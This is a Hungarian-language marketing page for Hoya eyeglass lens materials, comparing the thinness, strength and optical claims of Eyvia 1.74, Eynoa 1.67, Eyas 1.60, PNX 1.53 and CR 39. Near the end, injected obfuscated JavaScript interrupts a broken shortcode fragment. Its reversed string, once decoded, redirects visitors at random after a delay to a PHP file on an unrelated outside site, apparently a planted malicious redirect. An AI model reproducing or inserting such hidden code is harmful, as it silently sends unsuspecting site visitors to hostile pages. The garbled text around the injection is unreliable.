A Hoya alapanyagait a továbbfejlesztett gyártási eljárások és fejlesztési módszerek során tökéletesítették, ezért esztétikusak és kényelmes viseletet garantálnak.

Éveken át az üveget tartották a legmegfelelőbb alapanyagnak a szemüveglencsék gyártásához.
A szemüvegviselők elvárásai, azonban, egyre magasabbak lettek és érdeklődésük a könnyebb, vékonyabb és ezáltal kényelmesebb viseletet biztosító lencsék irányába fordult. Hogy a felmerült igényeknek eleget tegyen, a Hoya kifejlesztette a magas törésmutatójú műanyag lencsét.

A magas törésmutatójú alapanyagoknak számos előnye van, így nem meglepő hát, hogy a Hoya termékösszetételében ezen alapanyagok széles választékát kínálja. Kiváló optikai tulajdonságaik mellett, mindegyik alapanyag könnyű, vékony és karcálló.

Divatos keretekkel, praktikus színezésekkel és a Hoya által kifejlesztett, prémium kategóriás rétegeivel kombinálva, a Hoya alapanyagaiból készült lencsék a legjobb és legelegánsabb választásnak bizonyulnak.

A Hoya alapanyagainak választéka:

Természetes látás, elegáns megjelenés

Kezdetben a szemüveglencsék csupán arra szolgáltak, hogy biztosítsák az éles látást viselőjüknek. Mára azonban, az elegáns megjelenés is ugyanolyan fontos szemponttá vált, és ezért a vékonyított lencsék népszerűsége jelentősen megnőtt az elmúlt évtized során.
Az 1.74 törésmutatójú Eyvia a Hoya legvékonyabb alapanyaga, ezért ideális azon szemüvegviselők számára, akik erős pluszos vagy mínuszos korrekciót igényelnek.

Az Eyvia 1.74 szemüveglencsék előnyös tulajdonságai:

⋅ ultra vékony, ezért esztétikus megjelenést biztosít
⋅ könnyű, kényelmes viselet
⋅ természetes, kristálytiszta látást garantál
⋅ korlátlan keretválasztást tesz lehetővé
⋅ a legkiválóbb felületkialakításokkal áll rendelkezésre
⋅ biztonságos és tartós alapanyag

A legvékonyabb lencse a legkiválóbb felületkialakításokkal és rétegekkel kombinálva

Egy lencse minőségét minden esetben a megfelelő alapanyag, felületkialakítás és réteg kombinációja határozza meg. Az Eyvia 1.74 kizárólag a Hoya legkiválóbb progresszív és egyfókuszú kialakításaiban, valamint legmodernebb rétegeivel elérhető, ezért nem csupán a tiszta látás, de a kényelem és divat tekinteteben is kiemelkedő jelentőségű lencsének számít.

Valószínűleg a legvékonyabb 1.67 törésmutatójú műanyag lencse

A Hoya Eynoa 1.67 törésmutatójú alapanyaga többet nyújt, mint egy standard 1.67 törésmutatójú alapanyag. Azon túlmenően, hogy az Eynoa 1.67 alapanyag vékonyabb, könnyebb, erősebb és rugalmasabb, mint a standard 1.67 törésmutatójú alapanyagok, optikailag tisztább is. Az Eynoa 1.67 alapanyagban minden együtt van!

Az Eynoa 1.67 szemüveglencsék előnyös tulajdonságai:

⋅ Extra vékony 1.67 törésmutatójú alapanyag alacsony bázisgörbülettel – 40%-al vékonyabb a hagyományos 1.50 törésmutatójú alapanyagnál
⋅ Kivételesen erős és rugalmas – 5x erősebb a hagyományos 1.50 törésmutatójú alapanyagnál
⋅ Magas fokú hőállósága garantálja az optikai tisztaságot
⋅ 100% UV védelem
⋅ A legkiválóbb felületkialakításokkal és rétegekkel kombinálva

Az Eyas 1.60 alapanyag a legmagasabb színvonalú gyártástechnológiával készülő, kivételes tisztaságú és minőségű, rugalmas alapanyag.

Az Eyas 1.60 szemüveglencsék előnyös tulajdonságai:

⋅ Vékony: 35% -al vékonyabb a hagyományos 1.50 törésmutatójú alapanyagnál
⋅ Kivételesen erős és rugalmas: 4x erősebb a hagyományos 1.50 törésmutatójú alapanyagnál
⋅ Magas optikai tisztaság
⋅ A legkiválóbb felületkialakításokkal és rétegekkel kombinálva

A műanyag alapanyagok között a PNX igazi áttörést jelent megbízhatóságával, kivételes erősségével, ütésállóságával, ultra könnyű súlyával és optikailag tökéletes tulajdonságaival.

A PNX 1.53 szemüveglencsék előnyös tulajdonságai:

⋅ Magas fokú ütésállóság – erős és biztonságos, így bármely lencsénél biztonságosabb viseletet biztosít
⋅ Magas szakítószilárdság – rugalmas és megbízható
⋅ Kivételesen könnyű, szinte lebeg a víz felszínén
⋅ Optikailag tiszta
⋅ A legkiválóbb felületkialakításokkal és rétegekkel kombinálva

) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andard műanyag alapanyag” open=”no”]

CR 39 1.50 – a standard műanyag alapanyag